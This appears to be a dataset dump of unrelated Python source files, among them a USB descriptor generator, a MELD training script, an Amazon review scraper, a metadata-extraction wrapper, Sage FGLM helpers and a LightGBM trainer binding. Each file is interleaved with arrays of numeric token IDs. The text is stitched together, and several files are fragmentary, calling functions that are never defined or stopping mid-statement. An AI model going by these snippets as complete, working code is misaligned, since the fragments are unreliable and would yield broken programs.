args.devices: # Put the CDC IAD just before the CDC interfaces. # There appears to be a bug in the Windows composite USB driver that requests the # HID report descriptor with the wrong interface number if the HID interface is not given # first. However, it still fetches the descriptor anyway. We could reorder the interfaces but # the Windows 7 Adafruit_usbser.inf file thinks CDC is at Interface 0, so we'll leave it # there for backwards compatibility. descriptor_list.append(cdc_iad) descriptor_list.extend(cdc_interfaces) if 'MSC' in args.devices: descriptor_list.extend(msc_interfaces) if 'HID' in args.devices: descriptor_list.extend(hid_interfaces) if 'AUDIO' in args.devices: # Only add the control interface because other audio interfaces are managed by it to ensure the # correct ordering. descriptor_list.append(audio_control_interface) # Finally, build the composite descriptor. configuration = standard.ConfigurationDescriptor( description="Composite configuration", wTotalLength=(standard.ConfigurationDescriptor.bLength + sum([len(bytes(x)) for x in descriptor_list])), bNumInterfaces=len(interfaces)) descriptor_list.insert(0, configuration) string_descriptors = [standard.StringDescriptor(string) for string in StringIndex.strings_in_order()] serial_number_descriptor = string_descriptors[SERIAL_NUMBER_INDEX] c_file = args.output_c_file h_file = args.output_h_file c_file.write("""\ #include <stdint.h> #include "py/objtuple.h" #include "shared-bindings/usb_hid/Device.h" #include "{H_FILE_NAME}" """.format(H_FILE_NAME=h_file.name)) c_file.write("""\ // {DESCRIPTION} : {CLASS} """.format(DESCRIPTION=device.description, CLASS=device.__class__)) c_file.write("""\ const uint8_t usb_desc_dev[] = { """) for b in bytes(device): c_file.write("0x{:02x}, ".format(b)) c_file.write("""\ }; """) c_file.write("""\ const uint8_t usb_desc_cfg[] = { """) # Write out all the regular descriptors as one long array (that's how ASF4 does it). 
descriptor_length = 0 for descriptor in descriptor_list: c_file.write("""\ // {DESCRIPTION} : {CLASS} """.format(DESCRIPTION=descriptor.description, CLASS=descriptor.__class__)) b = bytes(descriptor) notes = descriptor.notes() i = 0 # This prints each subdescriptor on a separate line. n = 0 while i < len(b): length = b[i] for j in range(length): c_file.write("0x{:02x}, ".format(b[i + j])) c_file.write("// " + notes[n]) n += 1 c_file.write("\n") i += length descriptor_length += len(b) c_file.write("""\ }; """) pointers_to_strings = [] for idx, descriptor in enumerate(string_descriptors): c_file.write("""\ // {DESCRIPTION} : {CLASS} """.format(DESCRIPTION=descriptor.description, CLASS=descriptor.__class__)) b = bytes(descriptor) notes = descriptor.notes() i = 0 # This prints each subdescriptor on a separate line. variable_name = StringIndex.index_to_variable[idx] if not variable_name: variable_name = "string_descriptor{}".format(idx) const = "const " if variable_name == "usb_serial_number": const = "" c_file.write("""\ {const}uint16_t {NAME}[] = {{ """.format(const=const, NAME=variable_name)) pointers_to_strings.append("{name}".format(name=variable_name)) n = 0 while i < len(b): length = b[i] for j in range(length // 2): c_file.write("0x{:04x}, ".format(b[i + 2*j + 1] << 8 | b[i + 2*j])) n += 1 c_file.write("\n") i += length c_file.write("""\ }; """) c_file.write("""\ // array of pointer to string descriptors uint16_t const * const string_desc_arr [] = { """) c_file.write(""",\ """.join(pointers_to_strings)) c_file.write(""" }; """) c_file.write("\n") hid_descriptor_length = len(bytes(combined_hid_report_descriptor)) # Now we values we need for the .h file. h_file.write("""\ #ifndef MICROPY_INCLUDED_AUTOGEN_USB_DESCRIPTOR_H #define MICROPY_INCLUDED_AUTOGEN_USB_DESCRIPTOR_H #include <stdint.h> extern const uint8_t usb_desc_dev[{device_length}]; extern const uint8_t usb_desc_cfg[{configuration_length}]; extern uint16_t usb_serial_number[{serial_number_length}]; extern uint16_t const * const string_desc_arr [{string_descriptor_length}]; extern const uint8_t hid_report_descriptor[{hid_report_descriptor_length}]; #define CFG_TUSB_RHPORT0_MODE ({rhport0_mode}) #define USB_HID_NUM_DEVICES {hid_num_devices} // Vendor name included in Inquiry response, max 8 bytes #define CFG_TUD_MSC_VENDOR "{msc_vendor}" // Product name included in Inquiry response, max 16 bytes #define CFG_TUD_MSC_PRODUCT "{msc_product}" """ .format(serial_number_length=len(bytes(serial_number_descriptor)) // 2, device_length=len(bytes(device)), configuration_length=descriptor_length, max_configuration_length=max(hid_descriptor_length, descriptor_length), string_descriptor_length=len(pointers_to_strings), hid_report_descriptor_length=len(bytes(combined_hid_report_descriptor)), rhport0_mode='OPT_MODE_DEVICE | OPT_MODE_HIGH_SPEED' if args.highspeed else 'OPT_MODE_DEVICE', hid_num_devices=len(args.hid_devices), msc_vendor=args.manufacturer[:8], msc_product=args.product[:16])) # Write out the report descriptor and info c_file.write("""\ const uint8_t hid_report_descriptor[{HID_DESCRIPTOR_LENGTH}] = {{ """.format(HID_DESCRIPTOR_LENGTH=hid_descriptor_length)) for b in bytes(combined_hid_report_descriptor): c_file.write("0x{:02x}, ".format(b)) c_file.write("""\ }; """) # Write out USB HID report buffer definitions. 
for name in args.hid_devices: c_file.write("""\ static uint8_t {name}_report_buffer[{report_length}]; """.format(name=name.lower(), report_length=hid_report_descriptors.HID_DEVICE_DATA[name].report_length)) if hid_report_descriptors.HID_DEVICE_DATA[name].out_report_length > 0: c_file.write("""\ static uint8_t {name}_out_report_buffer[{report_length}]; """.format(name=name.lower(), report_length=hid_report_descriptors.HID_DEVICE_DATA[name].out_report_length)) # Write out table of device objects. c_file.write(""" usb_hid_device_obj_t usb_hid_devices[] = { """) for name in args.hid_devices: device_data = hid_report_descriptors.HID_DEVICE_DATA[name] out_report_buffer = '{}_out_report_buffer'.format(name.lower()) if device_data.out_report_length > 0 else 'NULL' c_file.write("""\ {{ .base = {{ .type = &usb_hid_device_type }}, .report_buffer = {name}_report_buffer, .report_id = {report_id}, .report_length = {report_length}, .usage_page = {usage_page:#04x}, .usage = {usage:#04x}, .out_report_buffer = {out_report_buffer}, .out_report_length = {out_report_length}, }}, """.format(name=name.lower(), report_id=report_ids[name], report_length=device_data.report_length, usage_page=device_data.usage_page, usage=device_data.usage, out_report_buffer=out_report_buffer, out_report_length=device_data.out_report_length)) c_file.write("""\ }; """) # Write out tuple of device objects. c_file.write(""" mp_obj_tuple_t common_hal_usb_hid_devices = {{ .base = {{ .type = &mp_type_tuple, }}, .len = {num_devices}, .items = {{ """.format(num_devices=len(args.hid_devices))) for idx in range(len(args.hid_devices)): c_file.write("""\ (mp_obj_t) &usb_hid_devices[{idx}], """.format(idx=idx)) c_file.write("""\ }, }; """) h_file.write("""\ #endif // MICROPY_INCLUDED_AUTOGEN_USB_DESCRIPTOR_H """)
[ 2, 30628, 55, 12, 8979, 15269, 8206, 25, 1946, 4527, 37906, 1222, 13588, 37906, 20420, 357, 5450, 1378, 12567, 13, 785, 14, 324, 1878, 4872, 14, 21170, 5013, 29412, 14, 34960, 82, 14, 3642, 2455, 669, 8, 198, 2, 198, 2, 30628, 55, ...
2.381063
9,875
from tqdm import tqdm import pandas as pd import numpy as np, argparse, time, pickle, random, os, datetime import torch import torch.optim as optim from model import MaskedNLLLoss, BC_LSTM from dataloader import MELDDataLoader from sklearn.metrics import f1_score, confusion_matrix, accuracy_score, classification_report def setup_seed(seed): """ Manually Fix the random seed to get deterministic results. """ torch.manual_seed(seed) torch.cuda.manual_seed(seed) torch.cuda.manual_seed_all(seed) np.random.seed(seed) random.seed(seed) torch.benchmark = False torch.backends.cudnn.deterministic = True if __name__ == '__main__': args = parse_args() args.cuda = torch.cuda.is_available() if args.cuda: print('Running on GPU') else: print('Running on CPU') for seed in [1, 11, 111, 1111, 11111]: setup_seed(seed) args.seed = seed print(args) model = BC_LSTM(args) print('MELD BC_LSTM MODULE ...') if args.cuda: model.cuda() loss_weights = torch.FloatTensor([1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]) loss_function = MaskedNLLLoss(loss_weights.cuda() if args.cuda else loss_weights) optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.l2) lf = open('logs/cnn_meld_logs.txt', 'a') dataloader = MELDDataLoader(args) valid_losses, valid_fscores = [], [] test_fscores, test_accuracys, test_losses = [], [], [] best_loss, best_label, best_pred, best_mask = None, None, None, None for e in range(args.epochs): start_time = time.time() train_loss, train_acc, _, _, _, train_fscore = train_or_eval_model(model, loss_function, dataloader['train'], e, optimizer, mode='train') valid_loss, valid_acc, _, _, _, valid_fscore = train_or_eval_model(model, loss_function, dataloader['valid'], e, mode='valid') test_loss, test_acc, test_label, test_pred, test_mask, test_fscore = train_or_eval_model(model, loss_function, dataloader['test'], e, mode='test') valid_losses.append(valid_loss) valid_fscores.append(valid_fscore) test_losses.append(test_loss) test_accuracys.append(test_acc) test_fscores.append(test_fscore) x = 'epoch: {}, train_loss: {}, acc: {}, fscore: {}, valid_loss: {}, acc: {}, fscore: {}, test_loss: {}, acc: {}, fscore: {}, time: {} sec'.format(e+1, train_loss, train_acc, train_fscore, valid_loss, valid_acc, valid_fscore, test_loss, test_acc, test_fscore, round(time.time()-start_time, 2)) print (x) lf.write(x + '\n') valid_fscores = np.array(valid_fscores).transpose() test_fscores = np.array(test_fscores).transpose() # [1, epoches] test_accuracys = np.array(test_accuracys).transpose() # [epoches] f1_score1 = test_fscores[0][np.argmin(valid_losses)] acc_score1 = test_accuracys[np.argmin(valid_losses)] f1_score2 = test_fscores[0][np.argmax(valid_fscores[0])] acc_score2 = test_accuracys[np.argmax(valid_fscores[0])] scores = [acc_score1, f1_score1, acc_score2, f1_score2] scores = [str(item) for item in scores] print ('Test Scores: Weighted F1') print('@Best Valid Loss: Test Acc: {}, Test F1: {}'.format(acc_score1, f1_score1)) print('@Best Valid F1: Test Acc: {}, Test F1: {}'.format(acc_score2, f1_score2)) rf = open('results/cnn_meld_results.txt', 'a') rf.write('\t'.join(scores) + '\t' + str(args) + '\n') rf.close()
[ 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 299, 32152, 355, 45941, 11, 1822, 29572, 11, 640, 11, 2298, 293, 11, 4738, 11, 28686, 11, 4818, 8079, 198, 198, 11748, 28034, 198, 198, 11...
2.119454
1,758
#!/usr/bin/env python import os import sys import argparse import pat3dem.star as p3s import math if __name__ == '__main__': main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 11748, 28686, 198, 11748, 25064, 198, 11748, 1822, 29572, 198, 11748, 1458, 18, 9536, 13, 7364, 355, 279, 18, 82, 198, 11748, 10688, 198, 197, 197, 197, 198, 361, 11593, 3672, 834...
2.603774
53
from bs4 import BeautifulSoup import pandas as pd import requests import time import sys def reviews_scraper(asin_list, filename): ''' Takes a list of asins, retrieves html for reviews page, and parses out key data points Parameters ---------- List of ASINs (list of strings) Returns: ------- review information (list), reviews_df (Pandas DataFrame) ''' asin_list = [asin_list] print(asin_list) reviews = [] headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept-Encoding":"gzip, deflate", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "DNT":"1","Connection":"close", "Upgrade-Insecure-Requests":"1"} for asin in asin_list: print(f'Collecting reviews for {asin}') passed_last_page = None counter = 1 while (passed_last_page == None) and (counter <= 10): print(len(reviews)) reviews_url = f'https://www.amazon.com/product-reviews/{asin}/ref=cm_cr_arp_d_viewopt_srt?ie=UTF8&reviewerType=all_reviews&sortBy=recent&pageNumber={counter}' print(reviews_url) rev = requests.get(reviews_url, headers=headers) print(rev.status_code) reviews_page_content = rev.content review_soup = BeautifulSoup(reviews_page_content, features='lxml') print(review_soup) passed_last_page = review_soup.find('div', attrs={'class': 'a-section a-spacing-top-large a-text-center no-reviews-section'}) if passed_last_page == None: for d in review_soup.findAll('div', attrs={'data-hook':'review'}): # print(d) try: date = d.find('span', attrs={'data-hook':'review-date'}) date = date.text.split(' ')[-3:] date = ' '.join(date) except: date = 'null' try: title = d.find('a', attrs={'data-hook': 'review-title'}) except: title = 'null' try: product = d.find('a', attrs={'data-hook': 'format-strip'}) product = product.text except: product = 'null' try: review_asin = product['href'].split('/')[3] except: review_asin = asin try: verified = d.find('span', attrs={'data-hook':'avp-badge'}) if verified == None: verified = 'Not Verified' else: verified = verified.text except: verified = 'null' try: description = d.find('span', attrs={'data-hook': 'review-body'}) except: description = 'null' try: reviewer_name = d.find('span', attrs={'class': 'a-profile-name'}) except: reviewer_name = 'null' try: stars = d.find('span', attrs={'class': 'a-icon-alt'}) except: stars = 'null' reviews.append([review_asin, product, date, verified, title.text, description.text, reviewer_name.text, float(stars.text[0:3])]) else: pass counter += 1 time.sleep(15) reviews_df = pd.DataFrame(reviews, columns=['asin','product','date', 'verified', 'title', 'desc', 'reviewer_name', 'rating']) reviews_df.to_csv(f'data/reviews/{filename}') print(f'{len(reviews)} reviews for {len(asin_list)} asins stored successfully in {filename}') return reviews, reviews_df if __name__ == '__main__': reviews_scraper(*sys.argv[1:])
[ 6738, 275, 82, 19, 1330, 23762, 50, 10486, 198, 11748, 19798, 292, 355, 279, 67, 198, 11748, 7007, 198, 11748, 640, 198, 11748, 25064, 628, 198, 4299, 8088, 62, 1416, 38545, 7, 47337, 62, 4868, 11, 29472, 2599, 198, 220, 220, 220, 7...
1.809706
2,349
# noinspection PyUnresolvedReferences import os import re # TODO I'm going to need to make a dictionary for my big list of stuff i care about and what's needed for # every file type.... RAF = ['EXIF:LensModel', 'MakerNotes:RawImageHeight', 'MakerNotes:RawImageWidth', 'EXIF:CreateDate', 'EXIF:ModifyDate', 'EXIF:SerialNumber', 'Composite:Aperture', 'EXIF:FocalLength', 'EXIF:Make', 'EXIF:Model', 'EXIF:LensMake'] MOV = ['EXIF:LensModel', 'MakerNotes:RawImageHeight', 'MakerNotes:RawImageWidth', 'EXIF:CreateDate', 'EXIF:ModifyDate', 'EXIF:SerialNumber', 'Composite:Aperture', 'EXIF:FocalLength', 'EXIF:Make', 'EXIF:Model', 'EXIF:LensMake', 'QuickTime:VideoFrameRate', 'QuickTime:Duration'] R3D = ['ClipName', 'EdgeTC', 'EndEdgeTC', 'TotalFrames', 'FrameHeight', 'FrameWidth', 'Aperture', 'ISO', 'Date', 'AudioSlate', 'VideoSlate', 'Camera', 'CameraModel', 'CameraPIN', 'MediaSerialNumber', 'LensSerialNumber', 'FPS', 'AspectRatio', 'Kelvin', 'LensName', 'LensBrand', 'FocalLength', 'Shutter(deg)', 'SensorID', 'SensorName', 'Take'] def check_exiftool(): """ checks if exiftool is installed. :return: """ pass def check_redline(): """ checks if redline is installed :return: """ pass def check_ffprobe(): """ checks if ffprobe is installed :return: """ pass def get(filein, tool='exiftool', print_output=False): """ Due to issues with the exiftool module this is provided as a way to parse output directly from exiftool through the system commands and cglexecute. For the moment it's only designed to get the lumberdata for a single file. :param filein: :return: dictionary containing lumberdata from exiftool """ ext = os.path.splitext(filein)[-1] d = {} if tool == 'exiftool': command = r'exiftool %s' % filein output = cgl_execute(command=command, verbose=False, print_output=print_output) for each in output['printout']: key, value = re.split("\s+:\s+", each) d[key] = value return d elif tool == 'ffprobe': command = r'%s %s' % ('ffprobe', filein) output = cgl_execute(command=command) for each in output['printout']: try: values = re.split(":\s+", each) key = values[0] values.pop(0) if 'Stream' in key: split_v = values[1].split(',') d['Image Size'] = split_v[2].split()[0] d['Source Image Width'], d['Source Image Height'] = d['Image Size'].split('x') d['Video Frame Rate'] = split_v[4].split(' fps')[0].replace(' ', '') if 'Duration' in key: d['Track Duration'] = '%s s' % values[0].split(',')[0] value = ' '.join(values) d[key] = value except ValueError: print('skipping %s' % each) return d def get_red_data(filein): """ method for pulling lumberdata from r3d files. REDLINE is a command line interface from RED that is required for this https://www.red.com/downloads/options?itemInternalId=16144 :param filein: :return: """ file_, ext_ = os.path.splitext(filein) if ext_.upper() == '.R3D': command = r'REDLINE --i %s --printMeta 1' % filein d = {} for line in os.popen(command).readlines(): line = line.strip('\n') line = line.replace('\t', '') line = line.replace(' ', '') try: key_, value = line.split(':', 1) if key_ != 'None': d[key_] = value except ValueError: pass return d
[ 2, 645, 1040, 14978, 9485, 3118, 411, 5634, 19927, 198, 11748, 28686, 198, 11748, 302, 198, 198, 2, 16926, 46, 314, 1101, 1016, 284, 761, 284, 787, 257, 22155, 329, 616, 1263, 1351, 286, 3404, 1312, 1337, 546, 290, 644, 338, 2622, 3...
2.229547
1,699
import logging from typing import List, Callable import numpy as np from pyquaternion import Quaternion from pyrep import PyRep from pyrep.errors import IKError from pyrep.objects import Dummy, Object from rlbench import utils from rlbench.action_modes import ArmActionMode, ActionMode from rlbench.backend.exceptions import BoundaryError, WaypointError from rlbench.backend.observation import Observation from rlbench.backend.robot import Robot from rlbench.backend.scene import Scene from rlbench.backend.task import Task from rlbench.demo import Demo from rlbench.observation_config import ObservationConfig _TORQUE_MAX_VEL = 9999 _DT = 0.05 _MAX_RESET_ATTEMPTS = 40 _MAX_DEMO_ATTEMPTS = 10
[ 11748, 18931, 198, 6738, 19720, 1330, 7343, 11, 4889, 540, 198, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 12972, 421, 9205, 295, 1330, 2264, 9205, 295, 198, 6738, 12972, 7856, 1330, 9485, 6207, 198, 6738, 12972, 7856, 13, 48277, 13...
3.125
224
from django import forms from django.contrib.contenttypes.forms import generic_inlineformset_factory from django.contrib.contenttypes.models import ContentType from django.db import models from django.test import TestCase from django.test.utils import isolate_apps from .models import ( Animal, ForProxyModelModel, Gecko, Mineral, ProxyRelatedModel, TaggedItem, )
[ 6738, 42625, 14208, 1330, 5107, 201, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 11299, 19199, 13, 23914, 1330, 14276, 62, 45145, 687, 2617, 62, 69, 9548, 201, 198, 6738, 42625, 14208, 13, 3642, 822, 13, 11299, 19199, 13, 27530, 1330, ...
3.208333
120
from .PyPolyBoRi import (BooleSet, Polynomial, BoolePolynomialVector, FGLMStrategy) def _fglm(I, from_ring, to_ring): r""" Unchecked variant of fglm """ vec = BoolePolynomialVector(I) return FGLMStrategy(from_ring, to_ring, vec).main() def fglm(I, from_ring, to_ring): r""" Convert *reduced* Groebner Basis in from_ring to a GroebnerBasis in to_ring. It acts independent of the global ring, which is restored at the end of the computation. TESTS:: sage: from sage.rings.polynomial.pbori import * sage: from sage.rings.polynomial.pbori.PyPolyBoRi import OrderCode sage: dp_asc = OrderCode.dp_asc sage: r=declare_ring(['x','y','z'],dict()) sage: old_ring = r sage: new_ring = old_ring.clone(ordering=dp_asc) sage: (x,y,z) = [old_ring.variable(i) for i in range(3)] sage: ideal=[x+z, y+z]# lp Groebner basis sage: from sage.rings.polynomial.pbori.fglm import fglm sage: list(fglm(ideal, old_ring, new_ring)) [y + x, z + x] """ for poly in I: if poly.ring().id() != from_ring.id(): raise ValueError("Ideal I must be from the first ring argument") return _fglm(I, from_ring, to_ring) def vars_real_divisors(monomial, monomial_set): r""" Returns all elements of of monomial_set, which result multiplied by a variable in monomial. TESTS:: sage: from sage.rings.polynomial.pbori.pbori import * sage: from sage.rings.polynomial.pbori.PyPolyBoRi import OrderCode sage: dp_asc = OrderCode.dp_asc sage: from sage.rings.polynomial.pbori.PyPolyBoRi import Ring sage: r=Ring(1000) sage: x = r.variable sage: b=BooleSet([x(1)*x(2),x(2)]) sage: from sage.rings.polynomial.pbori.fglm import vars_real_divisors sage: vars_real_divisors(x(1)*x(2)*x(3),b) {{x(1),x(2)}} """ return BooleSet(Polynomial(monomial_set.divisors_of(monomial)). \ graded_part(monomial.deg() - 1)) def m_k_plus_one(completed_elements, variables): r""" Calculates $m_{k+1}$ from the FGLM algorithm as described in Wichmanns diploma thesis It would be nice to be able to efficiently extract the smallest term of a polynomial. TESTS:: sage: from sage.rings.polynomial.pbori.pbori import * sage: from sage.rings.polynomial.pbori.PyPolyBoRi import OrderCode sage: dp_asc = OrderCode.dp_asc sage: from sage.rings.polynomial.pbori.PyPolyBoRi import Ring sage: r=Ring(1000) sage: x = r.variable sage: from sage.rings.polynomial.pbori.PyPolyBoRi import Monomial sage: s=BooleSet([x(1)*x(2),x(1),x(2),Monomial(r),x(3)]) sage: from sage.rings.polynomial.pbori.fglm import m_k_plus_one sage: variables=BooleSet([x(1),x(2),x(3)]) sage: m_k_plus_one(s,variables) x(2)*x(3) sage: r2 = r.clone(ordering=dp_asc) sage: m_k_plus_one(r2(s).set(),r2(variables).set()) x(1)*x(3) """ return sorted(completed_elements.cartesian_product(variables).diff( completed_elements))[0]
[ 6738, 764, 20519, 34220, 16635, 49, 72, 1330, 357, 46120, 293, 7248, 11, 12280, 26601, 498, 11, 21458, 293, 34220, 26601, 498, 38469, 11, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220,...
2.12942
1,499
""" Uses UMAP (https://umap-learn.readthedocs.io/en/latest/index.html) to reduce course embeddings to two dimensions for visualization. """ import pandas as pd import umap from sklearn.preprocessing import StandardScaler from ferry import config courses = pd.read_csv( config.DATA_DIR / "course_embeddings/courses_deduplicated.csv", index_col=0, ) # mypy: ignore-errors embeddings = pd.read_hdf( config.DATA_DIR / "course_embeddings/fasttext_embeddings.h5", key="embeddings", ) embeddings = StandardScaler().fit_transform(embeddings) reducer = umap.UMAP() umap_embeddings = reducer.fit_transform(embeddings) courses["umap1"] = umap_embeddings[:, 0] courses["umap2"] = umap_embeddings[:, 1] courses.to_csv(config.DATA_DIR / "course_embeddings/courses_deduplicated_umap.csv")
[ 37811, 198, 5842, 274, 471, 33767, 357, 5450, 1378, 388, 499, 12, 35720, 13, 961, 83, 704, 420, 82, 13, 952, 14, 268, 14, 42861, 14, 9630, 13, 6494, 8, 284, 4646, 1781, 198, 20521, 67, 654, 284, 734, 15225, 329, 32704, 13, 198, ...
2.587662
308
import inheritance shark = Predator('baby shark','sea','all',20) giraffe = Mammal('malwan','earth',20) giraffe.check_planet(inheritance.friendly) marti = Mammal('marti','earth',20) marti.check_planet(inheritance.friendly) print(inheritance.friendly.__dict__) print(inheritance.Planet.__dict__)
[ 11748, 24155, 628, 628, 628, 198, 1477, 668, 796, 38871, 10786, 40252, 21027, 41707, 8583, 41707, 439, 3256, 1238, 8, 198, 198, 70, 343, 21223, 796, 39502, 282, 10786, 7617, 8149, 41707, 16442, 3256, 1238, 8, 198, 70, 343, 21223, 13, ...
2.831776
107
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright (C) 2017, Luis Pedro Coelho <luis@luispedro.org> # vim: set ts=4 sts=4 sw=4 expandtab smartindent: # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. from . import SubCommand __all__ = ['DemoCommand'] demo = DemoCommand()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 15069, 357, 34, 8, 2177, 11, 20894, 28855, 1766, 417, 8873, 1279, 2290, 271, 31, 2290, 8802, 276, 305, 13, 2398, 29, 19...
3.454787
376
"""Tests for simple search controller, :mod:`search.controllers.simple`.""" from http import HTTPStatus from unittest import TestCase, mock from werkzeug.datastructures import MultiDict from werkzeug.exceptions import InternalServerError, NotFound, BadRequest from search.domain import SimpleQuery from search.controllers import simple from search.controllers.simple.forms import SimpleSearchForm from search.services.index import ( IndexConnectionError, QueryError, DocumentNotFound, )
[ 37811, 51, 3558, 329, 2829, 2989, 10444, 11, 1058, 4666, 25, 63, 12947, 13, 3642, 36667, 13, 36439, 63, 526, 15931, 198, 198, 6738, 2638, 1330, 14626, 19580, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 11, 15290, 198, 198, 6738, 266,...
3.577465
142
#!/usr/bin/env python # ROS Libraries import actionlib from actionlib_msgs.msg import GoalStatus from control_msgs.msg import JointTrajectoryControllerState, FollowJointTrajectoryAction, FollowJointTrajectoryGoal from kuri_wandering_robot.msg import Power from wandering_behavior.msg import WanderAction, WanderGoal import rospy from sensor_msgs.msg import CompressedImage from std_msgs.msg import Empty from trajectory_msgs.msg import JointTrajectoryPoint # Python Default Libraries import base64 import csv from enum import Enum import os import requests import threading import time import traceback # Custom Libraries from sent_messages_database import SentMessagesDatabase if __name__ == "__main__": rospy.init_node("kuri_wandering_robot") kuri_wandering_robot = KuriWanderingRobot() rospy.spin()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 48263, 46267, 198, 11748, 2223, 8019, 198, 6738, 2223, 8019, 62, 907, 14542, 13, 19662, 1330, 25376, 19580, 198, 6738, 1630, 62, 907, 14542, 13, 19662, 1330, 16798, 15721, 752, 652, ...
3.348361
244
# - Generated by tools/entrypoint_compiler.py: do not edit by hand """ Trainers.LightGbmBinaryClassifier """ import numbers from ..utils.entrypoints import EntryPoint from ..utils.utils import try_set, unlist def trainers_lightgbmbinaryclassifier( training_data, predictor_model=None, number_of_iterations=100, learning_rate=None, number_of_leaves=None, minimum_example_count_per_leaf=None, feature_column_name='Features', booster=None, label_column_name='Label', example_weight_column_name=None, row_group_column_name=None, normalize_features='Auto', caching='Auto', unbalanced_sets=False, weight_of_positive_examples=1.0, sigmoid=0.5, evaluation_metric='Logloss', maximum_bin_count_per_feature=255, verbose=False, silent=True, number_of_threads=None, early_stopping_round=0, batch_size=1048576, use_categorical_split=None, handle_missing_value=True, use_zero_as_missing_value=False, minimum_example_count_per_group=100, maximum_categorical_split_point_count=32, categorical_smoothing=10.0, l2_categorical_regularization=10.0, seed=None, parallel_trainer=None, **params): """ **Description** Train a LightGBM binary classification model. :param number_of_iterations: Number of iterations. (inputs). :param training_data: The data to be used for training (inputs). :param learning_rate: Shrinkage rate for trees, used to prevent over-fitting. Range: (0,1]. (inputs). :param number_of_leaves: Maximum leaves for trees. (inputs). :param minimum_example_count_per_leaf: Minimum number of instances needed in a child. (inputs). :param feature_column_name: Column to use for features (inputs). :param booster: Which booster to use, can be gbtree, gblinear or dart. gbtree and dart use tree based model while gblinear uses linear function. (inputs). :param label_column_name: Column to use for labels (inputs). :param example_weight_column_name: Column to use for example weight (inputs). :param row_group_column_name: Column to use for example groupId (inputs). :param normalize_features: Normalize option for the feature column (inputs). :param caching: Whether trainer should cache input training data (inputs). :param unbalanced_sets: Use for binary classification when training data is not balanced. (inputs). :param weight_of_positive_examples: Control the balance of positive and negative weights, useful for unbalanced classes. A typical value to consider: sum(negative cases) / sum(positive cases). (inputs). :param sigmoid: Parameter for the sigmoid function. (inputs). :param evaluation_metric: Evaluation metrics. (inputs). :param maximum_bin_count_per_feature: Maximum number of bucket bin for features. (inputs). :param verbose: Verbose (inputs). :param silent: Printing running messages. (inputs). :param number_of_threads: Number of parallel threads used to run LightGBM. (inputs). :param early_stopping_round: Rounds of early stopping, 0 will disable it. (inputs). :param batch_size: Number of entries in a batch when loading data. (inputs). :param use_categorical_split: Enable categorical split or not. (inputs). :param handle_missing_value: Enable special handling of missing value or not. (inputs). :param use_zero_as_missing_value: Enable usage of zero (0) as missing value. (inputs). :param minimum_example_count_per_group: Minimum number of instances per categorical group. (inputs). :param maximum_categorical_split_point_count: Max number of categorical thresholds. (inputs). :param categorical_smoothing: Lapalace smooth term in categorical feature spilt. Avoid the bias of small categories. (inputs). 
:param l2_categorical_regularization: L2 Regularization for categorical split. (inputs). :param seed: Sets the random seed for LightGBM to use. (inputs). :param parallel_trainer: Parallel LightGBM Learning Algorithm (inputs). :param predictor_model: The trained model (outputs). """ entrypoint_name = 'Trainers.LightGbmBinaryClassifier' inputs = {} outputs = {} if number_of_iterations is not None: inputs['NumberOfIterations'] = try_set( obj=number_of_iterations, none_acceptable=True, is_of_type=numbers.Real) if training_data is not None: inputs['TrainingData'] = try_set( obj=training_data, none_acceptable=False, is_of_type=str) if learning_rate is not None: inputs['LearningRate'] = try_set( obj=learning_rate, none_acceptable=True, is_of_type=numbers.Real) if number_of_leaves is not None: inputs['NumberOfLeaves'] = try_set( obj=number_of_leaves, none_acceptable=True, is_of_type=numbers.Real) if minimum_example_count_per_leaf is not None: inputs['MinimumExampleCountPerLeaf'] = try_set( obj=minimum_example_count_per_leaf, none_acceptable=True, is_of_type=numbers.Real) if feature_column_name is not None: inputs['FeatureColumnName'] = try_set( obj=feature_column_name, none_acceptable=True, is_of_type=str, is_column=True) if booster is not None: inputs['Booster'] = try_set( obj=booster, none_acceptable=True, is_of_type=dict) if label_column_name is not None: inputs['LabelColumnName'] = try_set( obj=label_column_name, none_acceptable=True, is_of_type=str, is_column=True) if example_weight_column_name is not None: inputs['ExampleWeightColumnName'] = try_set( obj=example_weight_column_name, none_acceptable=True, is_of_type=str, is_column=True) if row_group_column_name is not None: inputs['RowGroupColumnName'] = try_set( obj=row_group_column_name, none_acceptable=True, is_of_type=str, is_column=True) if normalize_features is not None: inputs['NormalizeFeatures'] = try_set( obj=normalize_features, none_acceptable=True, is_of_type=str, values=[ 'No', 'Warn', 'Auto', 'Yes']) if caching is not None: inputs['Caching'] = try_set( obj=caching, none_acceptable=True, is_of_type=str, values=[ 'Auto', 'Memory', 'None']) if unbalanced_sets is not None: inputs['UnbalancedSets'] = try_set( 